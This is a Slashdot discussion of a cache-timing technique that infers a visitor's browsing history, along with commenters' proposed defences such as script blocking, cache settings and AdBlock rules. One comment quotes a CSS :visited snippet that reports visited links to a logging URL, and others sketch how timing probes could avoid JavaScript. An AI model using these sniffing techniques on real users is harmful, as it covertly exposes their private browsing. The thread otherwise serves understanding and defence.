Browser History Sniffing Is Back 161
An anonymous reader writes "Remember CSS history sniffing? The leak is plugged in all major browsers today, but there is some bad news: in a post to the Full Disclosure mailing list, security researchers have showcased a brand new tool to quickly extract your history by probing the cache, instead. The theory isn't new, but a convincing implementation is."
Easy work-around (Score:5, Informative)
Re:Easy work-around (Score:5, Insightful)
Re:Easy work-around (Score:5, Informative)
Cache and history are completely different features. 0 cache means you'll have to download the same CSS/JS/image files over and over again for each page on the same website, which is a waste of resources for both you and the server.
Re:Easy work-around (Score:5, Insightful)
Re:Easy work-around (Score:4, Informative)
There are plenty of cases where actual content - images, videos, etc - benefit from caching. It's not all garbage.
Re: (Score:2)
Re:Easy work-around (Score:5, Insightful)
You might not care, but the guy paying for the server's bandwidth certainly does ;)
Re:Easy work-around (Score:4, Informative)
There is a large difference between "user" and "customer", the problem is you may think that you are a "customer" (or at least potential customer) of every site you visit, but this is incorrect.
"Customer" implies that there is a business relationship in play, however if it is a forum or other free resource, you will never be a customer as there is nothing to purchase. Not every website on the internet is a business.
It is often seen as abuse when a user downloads or needlessly accesses a resource (files) multiple times and website administrators often have no qualms blocking abuse, it means less load on their site's server and more resources free (bandwidth, connection slots on the webserver daemon) for other users and on top of that: potentially lowering their bill.
Coming from experience, I've seen people use download managers and misconfigure them purposefully so they open 20-100+ connections to a file feeling that the website somehow owes them that file, doing so on a webpage with a browser is no different.
Re: (Score:2)
Re:Easy work-around (Score:5, Interesting)
If I'm trying to infer where you've been, a nicely formatted(often with handy metadata, timestamps, etc.) history list sure is handy, if I can get access to it; but it's also an obviously juicy target, and something that browser designers are going to try to keep me away from.
Your cache is a lot messier; but it does provide grounds for inference about where you've been(and thus can retrieve from cache in essentially zero time) and where you haven't recently been(and thus have to burn a few tens to hundreds of milliseconds retrieving from a remote host)... Worse, unlike history(which is really just a convenience feature for the user, and can be totally frozen out of any remotely observable aspect of loading a page, those purple links aren't life or death...) the browser cache is an architectural feature that one cannot remove without sacrificing performance, and one cannot even easily obfuscate without sacrificing performance. It's a much lousier dataset than the history, since history is designed to document where you've been but cache only does that partially and incidentally; but it is one that is harder to get rid of without user-visible sacrifices and increases in network load...
Re:Easy work-around (Score:4, Interesting)
You wouldn't need to eliminate the cache, just Javascript's ability to measure the load times reliably. For example, you could prevent scripts from reading the state of a particular resource during the e.g. 500 milliseconds after setting its URL, regardless of the source used (cache or network).
Re:Easy work-around (Score:5, Informative)
It would also be a bit tricky because inferential attacks wouldn't necessarily have to ask politely for the state of the resource they are interested in, they could instead attempt something else(say a script operation that will fail in a particular way unless the 3rd party resource is available). Barring a solution much cleverer than I can think of, you'd be at considerable risk of having to break progressive loading of pages entirely(or at least into human-visible-and-annoying stuttery chunks) in order to keep prevent a combination of a page interrogating its own state on the client, and correlating with timestamps on requests to servers controlled by the attacker...
Re: (Score:2)
Here's an idea to kill the cache attack, have cache loading speed simulate the network connection speed: Have the browser gather stats on its network use. Say the average load speed (call it AVGSPD) is 100KBps and the average lag (call it AVGLAG) is 0.5s. If it's about to load a big 500KB image from cache, it first introduces a delay of AVGLAG*random(0.5,1.5), and then an additional delay of FILESIZE/(AVGSPD*random(0.9,1.1)), so fetching the file would take somewhere around 5 seconds. This simulates the slo
Re: (Score:2)
You would think so... (Score:4, Interesting)
But according to how this exploit works they are not "completely different". They, in fact, have a small overlap. Apparently the exploit works by using JavaScript to load a file from a website and see how fast it loads. It infers you have been to a website if the file loads quickly.
They seem to have a trick to stop the process just before the browser puts the loaded file into the cache which prevents it from poisoning the very cache it is "testing".
Thus, setting cache to 0, which the OP recommends, and which I have been doing for years, is exactly the fix needed. I admit that I do not know he also disables history, as that would not help with this exploit.
Re:You would think so... (Score:5, Insightful)
The script doesn't actually analyze the cache, just the time it takes to load the resource, so if your proxy's cache is fast enough it might still be detected.
Re: (Score:2)
Plus, for one machine compromised in your LAN, that's all the family's browsing history that gets leaked. Looks like the OP strategy is actually making things worse regarding this exploit.
Re: (Score:2)
Sorry, I meant GP.
Re: (Score:3)
Except that if you read the article, it targets your cache, not your history.
It just tries to load various sites to see if they load quickly or not. If yes, then in local cache, else not. Thus used as how recently you have visited site (it it still in cache).
History -- i keep that going back about 240-360 days... much faster and more useful than google.
I mean if I wanna go to a site, why would I go to google rather than typing in a few letters of the site, -- and it knows which ones I visit most... all s
Re: (Score:2)
Re: (Score:3, Funny)
If your ultimate purpose was more privacy, I find it VERY amusing that you ended up willingly sharing everything with Google, of all parties. :D
Re: (Score:2)
There's a browser plugin you can use to anonymize Google queries, although if you signed up for a Gmail account in a more innocent time like I did and haven't migrated to your own hosting yet, the best thing you can do to reduce your Google footprint is to open your Gmail/Google Reader/Youtube/whatever pages in a separate browser from everything else. Firefox could use "tab sandboxing" - where individual tabs can be like their own private browsing session, basically. I think Chrome has something like that.
Re: (Score:2)
It's a valid concern, last I remember the only thing Chrome sends off is search requests as you type them, but now Firefox does that too (to use the search provider's autocomplete feature). Of course if you don't want to trust Chrome there's always Chromium.
Re: (Score:2)
Yep, but first install a Squid proxy on an internet-facing machine and then set all internal browsers to proxy through it, then set all browsers to use a cache size of 0.
Re: (Score:3, Informative)
If I correctly understand how this attack works, they could easily read your proxy cache the same way.
Re: (Score:2)
How will that prevent this exploit? It could is your proxy is not faster that your internet connection... but what purpose would your proxy serves then?
Re: (Score:2)
if you both turn of all you're scripting and caching
But neither of us turn of all we're scripting and caching so the problem persists.
Re: (Score:2)
But in order not to further scare you, if you turn off javascript, 80% of the connecting adnetworks won't load any ads (and their profiling stuff)
and if you both turn of all you're scripting and caching, I won't be able to profile much besides your visits to sites running within our ad network.
Haha if only. A lot (and I mean A LOT) of tracking services use pure HTML tracking, to disable them you have to control cross-domain requests. Ghostery or RequestPolicy are good plugins for doing this.
Unreliable (Score:3, Informative)
This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.
Re: (Score:2, Funny)
This tool seems unreliable (at least in Chrome). I've been on YouTube five times in the past 48 hours and it still showed up grey on the sniffer.
Most likely an OS/Vendor issue.
If you're using a Mac, pretty much every sniffer tool will show up ghey.
Re: (Score:2)
Yeah, it's too inaccurate to be convincing. A random algorithm weighted on popularity could have a similar success rate. Maybe if the number of tested sites were increased it would be more clear whether it works or not.
Re: (Score:3, Funny)
That's great news. The Mexicans at Lowe's are really overpriced.
Re: (Score:2)
Facebook's "like" button is a tracking widget, that loads a page which then contains JS to do more in-depth analytics if you're not using a script blocker. The page the Like button fetches is probably what the test page checks for.
Not surpisiing (Score:1, Insightful)
Browser developers are not doing proper development anymore. They are too busy playing stupid games like hiding http://, removing status bars, inflating the version numbers and breaking your extensions to do things like security or proper memory management.
Hard to block this (Score:5, Interesting)
This kind of timing attack isn't easy to block.
Some kinds of timing attacks are. I think I heard once that a timing attack could be made against passwords in TOPS-20, because the passwords were stored in plaintext and compared one character at a time. The trick was to do the system call to check the password (or whatever it was) with the guess split across a page boundary (maybe the second page was forced out of memory or something). Since the system call would return as soon as one character didn't match, it was easy to see if the next character being guessed was correct or not. The fix was simple enough. Obviously there was a bit more to it than that, but I only heard this apocryphally as it was, and at that probably about 25 years ago.
This kind of thing is harder to fix, since it depends upon the difference between cache and non-cache access time, and the non-cached access time is not deterministic. It would be possible for the browser to introduce an artificial delay into the appropriate JavaScript calls, but that would make performance go down the tubes.
In any event, I tried it and the results didn't look very accurate (the first time, all of the sites it tried claimed that I had hit them; the secon time it caimed only one site was in cache, and after that it thought that nothing was).
Javascript required? (Score:5, Informative)
Re:Javascript required? (Score:5, Insightful)
Re: (Score:2)
...and it confuses the hell out of a lot of people who don't understand what javascript is. "I just want to see the webpage"
Rather than trying to get people using what is frankly an arcane and imprecise tool, we would be better off removing the incentive which makes data theft valuable. This then becomes and economic and social problem rather than technical. there are few situations where the latter can be solved well with the former
Re: (Score:2)
I ended up replacing it with request policy as half the time I ended up having to enable all the javascript to get the page to load anyways. I mostly just wish it provided a method of blacklisting things like Facebook that never add any value to the site.
Re: (Score:2)
Facebook's tracking is just the tip of the iceberg...look at Ghostery's downloadable blocklist.
Re: (Score:2)
I think you might be mistaking "difficult" for "it takes time to do it". Until marketing/bean counters/PHB's realize they're giving their web devs about a third as much time as they should most of the time, things like 'graceful degradation' get turned into 'it works in the CEO's browser, it's done."
Re: (Score:2)
Graceful degradation is nice theory. That's all it is until you apply some form of constraints because it's discussed as if it remains abstract. Be realistically, how big a percentage of users will actually require access to a fully degraded website?
Small. Very.
Because the great majority of them use a browser similar to the CEO's. It's not really a bad measure unless the CEO is a te
Re:Javascript required? (Score:4, Interesting)
YES! I 2nd that! But it should be better integrated and off by default -- they can try to hint users into using it by other means. I have NoScript on by default just because I was sick of white listing everything; but any site I feel bad about I blacklist. Its not as secure but it is doing something. Add a subscription list like AdBlock has and it wouldn't be so bad for people who want to help compile black and white lists. Normal users would get a blacklist with it always on by default and others who know better will know enough to flip the policy. The paranoid would turn off the subscription lists and do it all themselves.
I would like a power-user area to block certain DOM features completely. I do not trust canvas by default or most the newer DOM features by default; it should ask me to ok those when a site tries to use them. (the lists mentioned above could specify what is white or black listed not just whole domains etc.) Actually, I'm wary of CSS3 fonts because font render engines haven't been a focus of security and 3D drivers... you are lucky to have stable fast 3D; security? currently a pipe dream.
A DOM js access list by domain would be a lot like a sandbox system for websites.
Re: (Score:2)
True. They may not be exploited at the time you visit but when you return; it may not target your browser either. Sure, it is not fool proof; but blocking javascript completely isn't full protection either. ALLOWING flash is probably more of a risk anyhow.
Re:Javascript required? (Score:4, Informative)
It's very easy to manage
I've installed NoScript for non-technical people and it almost immediately caused them headaches.
There are plenty of internal academic/work websites that rely on fetching scripts from third parties...
Which is exactly what NoScript is designed to prevent.
And then there are endless websites that want you to allow scripts from a CDN or Google APIs or social bookmarking.
NoScript's generic default allows aren't inclusive enough to keep websites from breaking for most people.
Re: (Score:3)
I've noticed that. When I'm using noscript I tend to spend most of my time enabling things on sites as I often times can't even see the site. I've found that request policy is a lot easier to use in many ways, but unfortunately lacks any sort of black list so you're limited in what you can do as far as blocking portions of a site's javascript collection.
Re: (Score:2)
You do realize that Noscript does a lot of other things as well, right? That and just because pretty quickly everything gets enabled doesn't make noscript worthless. It just means that you don't receive as much protection. I personally find it to be quite helpful when I click a link from a search engine and end up somewhere I don't want to be.
Re:Javascript required? (Score:4, Insightful)
And this wont stop as long as most people are stupid enough to accept browsers that will just run whatever random script some random website hands them. Unfortunately, it's a bit of a chicken and egg problem in that way. If the major browsers would behave sanely, these insanely bad web practices wouldnt work, and the insanely bad 'web designers' that come up with them would have to learn to write real web pages or find another line of work. As is, too many people dont know and dont want to know, and we all pay the price in one way or another.
I'll keep my noscript and be happy that broken pages actually display as broken for me, so I know to avoid them, rather than having my browser just randomly download and execute whatever crap codes the broken web page needs to make it look like something else.
Re: (Score:2)
It's definitely not easy enough for the average user. My dad's better than average with computers and he struggles with it sometimes.
Suggest NoScript to implement Whitelist loader (Score:4, Interesting)
Perhaps you are both right.
Let's start with the idea that NoScript by default is enabled.
Let's continue with the notion that application management should be as minimal as possible.
I give firewall software as a good example. If it is not easy to do one of the following, then the software (in my opinion, for me) fails:
1) Monitor all software incoming / outgoing. Block anything not on the whitelist, log connections, provide an interface in the *background* for the user to allow or deny in the future as Rules
2) Monitor all software incoming / outgoing. Allow all by default, log all connections, provide an interface for the user to allow or deny in the future as Rules
NoScript does most of this already. What it lacks is a reliable whitelist, similar to that used by Ghostery or AdBlock Plus, which loads the user up with 99% of the Rules they need.
I agree with your comment. For most users, you can whitelist all major bank sites - knowing that 99% of the time the sites are fine.
If the user disagrees then they can modify this setting.
Add onto that list a whole bunch of sites where the root site should be able to be trusted; news sites - slashdot, news.com, guardian, age, newspapers, etc.
Built onto that well known commerical sites.
Make this list auto-update once per month; but not to override user set preferences.
There you go. A tool very similar in nature to Adblock Plus and Ghostery which upon startup has a configuration to protect users and supply 99% of the functionality needed.
If this was the case, then I would put this on lots of people's PCs, knowing that if there are issues then they can be dealt with.
Although, at the moment, Ghostery + AdBlock Plus on Firefox provide most of the protection needed in a usable, safe and coherent manner.
Re: (Score:2)
It's useful for being able to visit random websites without the fear of Javascripts exploits. Also useful for selectively blocking websites, such as Facebook (I do not trust it, and Facebook stuff is embedded everywhere).
Re: (Score:3, Informative)
Nope. NoScript protects against the relatively common attack vector of malicious 3rd-party scripts being injected into a site you already trust, via exploits or ad networks. In this scenario the site will try to load malware from http://lolhax.biz/ [lolhax.biz] or whatever, which it doesn't normally do and you haven't permitted, so it fails. It saved me once when a PHP forum I visited often got hacked.
Re: (Score:2)
This appears to require Javascript. Thank you, noscript.
It doesn't, really. This proof of concept is implemented using Javascript, because it's easier, but the basic concept doesn't require Javascript to work.
Re: (Score:3)
How do you observe download timings without Javascript?
Re: (Score:3)
Re: (Score:2)
How does that work considering that most browsers download resources in parallel (even if they actually load them to the page in order), particularly from different domains?
Re: (Score:2)
There's a limit to the number of resources they'll download in parallell; it would probably be necessary to saturate that first. In fact, filling up all of the available download slots might really help -- request a bunch of resources from a server that will respond to the connection request but not complete it. Then the attacker could start timing from the instant the server completes the pre-timing request, then stop when the server receives the post-timing request. Some similar methods could be used t
Re: (Score:2)
Doesn't that assume the page controls the total pool? My Firefox instance has eight established connections; with Ajax or background loading tabs, it's hardly unexpected that some other website will take over the only available socket, making a cached load appear as slow as a remote request.
Re: (Score:2)
Mmm, yes, I was assuming there's a pool per tab. With Chrome, since each tab is a separate process, I'm pretty sure that's the case.
I don't think that's an insuperable problem, though. The attacker can just watch the requests that are supposed to saturate the pool coming into the server, and if they stop arriving he can assume the pool is full. At that point he knows how large the available pool is, factoring in other connections already established, and can "release" enough connections to allow the pa
Re:Javascript required? (Score:4, Informative)
Oh, ok, but NoScript blocks those too, so betterunixthanunix's point still stands.
convincing implementation (Score:5, Interesting)
Convincing to who? to you?
ACM [acm.org] was quite convinced back in 2000 when they published the paper.
They obviously implemented it because it contains a lot of measurements.
Re: (Score:1)
Convincing to who? to you?
ACM [acm.org] was quite convinced back in 2000 when they published the paper.
They obviously implemented it because it contains a lot of measurements.
Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.
And obviously, yes, they implemented a method for doing this back in 2000 for that paper. It's what's being referred to when the author notes, "Such attacks were historically regarded as fairly impractical, slow, and noisy - and perhaps more importantly, one-shot." What we have now, though, is a method that is fast, practical, and nondestructive.
Re: (Score:3)
Convincing to browser developers, obviously, who moved to fix the other problems fairly quickly but have, to date, done nothing about this one.
Are you kidding me? The CSS visited link vulnerability took ages to get fixed.
What we have now, though, is a method that is fast, practical, and nondestructive.
It's too inaccurate to be practical. Try it.
without javascript (Score:4, Interesting)
They say it can work without javascript, but I do not believe that. None of the samples work without javascript. In the paper, it says:
We omit the straightforward but tedious details of how to write HTML that causes popular browsers to make serialized accesses to files.
Can anyone provide this tedious, but allegedly straightforward, and extremely critical detail?
Re: (Score:1)
HTML is typically rendered in the order that it is read, therefore its possible to know that A is requested before B etc
With that in mind you can sandwich your request to twitter between two dummy requests to a server that you control.
Server compares the timing on the dummy requests and can guess the timing for the real one.
Re: (Score:3)
There's a little more to it than that. Browsers open multiple connections in parallel. Historically, this was limited by the HTTP specification to two simultaneous connections, but recent versions of browsers have increased this limit. You'd have to detect how many simultaneous connections were in use (or hack it by detecting the browser) and make requests to enough tarpits to bog down all but one of the connections. It would probably be fairly reliable, but the work to build that just to demonstrate t
Re: (Score:1)
Wow, I was wondering the same thing, then I found this -
http://whattheinternetknowsaboutyou.com/docs/details.html [whattheint...outyou.com]
Skip down to the CSS section:
<style>
a#link1:visited { background-image: url(/log?link1_was_visited); }
a#link2:visited { background-image: url(/log?link2_was_visited); }
</style>
<a href="http://google.com" id="link1">
<a href="http://yahoo.com" id="link2">
The background-image is only loaded on the visited state...
Re:without javascript (Score:4, Informative)
This is already fixed in most browsers, you need to update/reconfigure yours.
How (Score:5, Informative)
Yay stateless web.
Fix: add a random delay for reporting time to load (Score:2)
It seems like you could add a random delay of up to a couple hundred milliseconds before the browser reports that an iframe has successfully loaded, making it harder to tell by the timing.
Re: (Score:3)
Except that would make JavaScript slower, which is the exact opposite of what the browser makers are going for.
Re: (Score:2)
Yes, it definitely would. You could certainly limit the scope to only apply to cross domain queries for out of viewport/small/hidden iframes, but that still might cause slowness issues for legitimate uses.
Re: (Score:2)
1/ actually read the article
2/ post cliff notes about it
3/ points
Works like a charm.
Now on topic: I clicked and it shows nothing because of my OCD: Ctrl-Shift-Del, Enter.
Private Browsing mode FTW! (Score:4, Insightful)
When I visit a "sensitive" site, like my bank, I open a new browser session and close it when I finish. Aside from that, I just don't worry about it, and have never had a problem. Hell, even that great data-mining wizard Google - My home page and probably the single most frequent site I hit - Always defaults me to Georgia (presumably the location of my ISP's HQ), missing by over a thousand miles.
Easy enough (Score:5, Interesting)
Tried the test for Opera, and it mostly worked (missed Newegg). Tried it in a private tab, didn't work at all. So, any site you don't want tracking you you load in a private tab. Which you should anyways.
Out of curiosity, I also tried the FF test (in Opera, still) and the IE test. The IE worked, better even than the dedicated test, while the FF test failed utterly. Curious.
And of course, as always, this test only works for the specific sites you test for, not generally. But that isn't surprising. Wasn't terribly fast, either, I'd certainly notice if you tested for hundreds or thousands of sites.
Alt-t, d, enter (Score:3, Interesting)
It's a dutch boy's thumb, but that quick key-combo clears history in Opera. I just habitually hit it between domains to kill tracking without screwing up sites that need cookies or js to function. Likely there's a Firefox equivalent.
What neither has by default is a way to do this automatically. Browser makers finally got around to letting us limit cookies to the visited site, but they could go much further.
Like just rig browser cache to be per domain -- there's no need for all domains to share the same cache.
Maybe it's the festish for 'fastest' browser? It just seems the makers aren't doing what can be done easily enough on modest modern machines to improve privacy.
A possible fix (Score:3)
While this specific implementation is very inaccurate, others using a similar method may work. An obvious workaround to these kind of attacks is to turn off caching, but that would increase loading times. I was wondering if there was a hack in some browser that would allow you to ban a site from using resources from another domain, whether it's by HTML or scripts. Does anyone know such a solution?
Re:A possible fix (Score:4, Informative)
AdBlock Plus lets you do that very easily.
e.g.
Block fsdn.com on third-party sites except slashdot.org
||fsdn.com^$third-party,domain=~slashdot.org
Block fbcdn.com on third-party sites except facebook.com, facebook.net, and fbcdn.net (write similar rules to block the other 3 facebook domains)
||fbcdn.com^$third-party,domain=~facebook.com|~facebook.net|~fbcdn.net
Re: (Score:2)
Yeah blocking individual sites is possible, but imperfect from a security perspective.
Re: (Score:2)
By which you mean it's limited to a finite number of sites?
The number of sites they can check for is also finite.
The number of sites in my history/cache is also finite.
Note currently it's "yes" or "no", and "no" is indistinguishable from "blocked". They could make it slightly more reliable if they actively checked to see if I was blocking (e.g. Grooveshark pops up a warning box if it can't load the facebook integration).
Re: (Score:2)
While it's possible to create a rule for every site you visit, it is impractical. The number of sites they can check is irrelevant, because you don't know which sites they will be testing for. The number of sites in your cache can be limited, but what sites are in it changes constantly.
Re: (Score:2)
You'd probably think it impractical to go through the history and click "Forget About This Site" for sites which you don't want it remembering you visited. Which, in my case, is most of the sites I don't frequent.
Re: (Score:2)
Other possible fixes:
Re: (Score:2)
If that's overkill for your requirements, I recommend Ghostery, which uses a blacklisting approach and includes a long list of tracking/ad services.
Better have good gag reflexes (Score:5, Funny)
Really? I call BS (Score:2)
I ran this "test" three times in succession. First go it showed sites which yes I might have been to though one, Dogster I was fairly certain I had not. I then clicked it again and this time it came up with almost every site in green. Running a third time gave the same results as the first attempt.
Re: (Score:2)
well, running safari it did get that I had visited slashdot.
going to facebook, it for some reason thought I had gone to twitter though.
(I know there's no "safari" version there, but the ie version did that)
Cache Experiment (Linux) (Score:2, Interesting)
I'm using Linux and I'm trying the same thing that I do with Adobe Flash... I /dev/null it...
cd to .mozilla/firefox/xxxxxxx.default (replace x's with your specific alphanumeric string) /dev/null Cache (creates symlink of Cache to /dev/null)
rm -rf Cache (deletes Cache dir and all subfolders)
ln -s
Since nothing escapes the event horizon that is /dev/null, your Cache is written but cannot be inspected by others seeking to pry into your well-deserved privacy.
So far, so good. I have noticed no slowness by doing t
Re: (Score:2)
In either case, wouldn't doing this with the ~/.macromedia directory cause many Flash apps (especially video players that rely on the LSOs for storing buffered video) to malfunction?
Convenience (Score:2)
You can buy your bread and butter at the local grocery with all your neighbors watching.
Or you can disguise and go to the other end of town, which takes time and increases traffic.
Simple fix? (Score:2)
It seems to me there's an easy way to make browsers immune to this: Introduce random delays when cached resources are fetched from other sites via JavaScript.
In a well-designed web-page, the static (i.e. cached) resources are referenced in the html (often in the headers) and not subject to timing attacks as they can be fetched in random order.
When something is requested dynamically via JavaScript it is typically not the cache anyways, so there is rarely a performance penalty.
When there is a performance pena
Re:but you have to run their software to do it... (Score:5, Informative)
jacked or tracked: it's your choice (Score:1)
If it's a reputable site - my bank, my VOIP provider, even the main domain for youtube or something - sure, run the software. But random scripts from weird sites? You have to be a few cards short of a full deck to trust random shit from the internet. It's the damn *internet*. Anyone can do anything on it, so it only takes about three functional neurons to realize that you should use a bit of caution. Even if you don't get jacked, you'll get tracked!
Re: (Score:1)
Ha ha ha oh wow.
Re:jacked or tracked: it's your choice (Score:5, Interesting)
If you think "reputable" means "safe", YOU'RE a few cards short of a full deck!
Re: (Score:3, Funny)
'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind.'
Re: (Score:2)
A guy I work with has been compromised twice: Once on his work PC visiting Drudge Report. The other was on his home PC while he was... err... never mind. Let's just say he's only been compromised once from a non-adult website and leave it at that.
Re: (Score:2)
And that is exactly why these scripts are run in a browser, and not directly from your desktop or so.
One of the tasks of a web browser is to provide a script jail, where scripts can run safely, and where they can access resources they need but nothing more. You are downloading stuff from the Internet to display - that's how web browsing works of course. And that is why I want to be able to put trust in my browser that it will do everything it can to prevent these scripts from breaking out of their jail, an
Re:Multiple tests give conflicting results (Score:4, Informative)
That's because the test consists on downloading a file and measuring if it was instantaneous (cached) or not. Of course, the second time you run it, the script itself will have downloaded (and therefore put in cache) the same file, tricking itself.
Re: (Score:2)
It is meant to be non-destructive to the cache.
In other words, they don't actually download the files. They request the files to see if the browser starts parsing them within a certain time frame (indicating a cached document). Regardless, they abort the request after that time limit and the document is never cached.
If it did down